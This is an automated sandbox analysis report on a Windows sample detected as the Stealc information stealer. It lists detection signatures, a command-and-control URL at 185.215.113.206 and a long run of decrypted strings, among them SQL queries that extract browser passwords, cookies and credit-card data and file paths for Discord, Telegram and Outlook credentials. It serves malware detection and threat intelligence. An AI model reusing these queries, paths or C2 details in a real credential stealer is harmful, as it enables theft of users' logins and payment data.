Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546537
MD5:212e008d0b8a1d4874846987f37e34fa
SHA1:0c125b1139dbbb0aa2fedfb916d1365001cce1e9
SHA256:d9d47fd94a18e02cb473ec8ed22d7d7f6ce79825f999d129d662f71409a48082
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 212E008D0B8A1D4874846987F37E34FA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7092JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7092JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T05:01:04.048750+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.d0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206Virustotal: Detection: 19%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 20%Perma Link
                Source: http://185.215.113.206/Virustotal: Detection: 19%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: history
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: History
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: open
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: files
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: token:
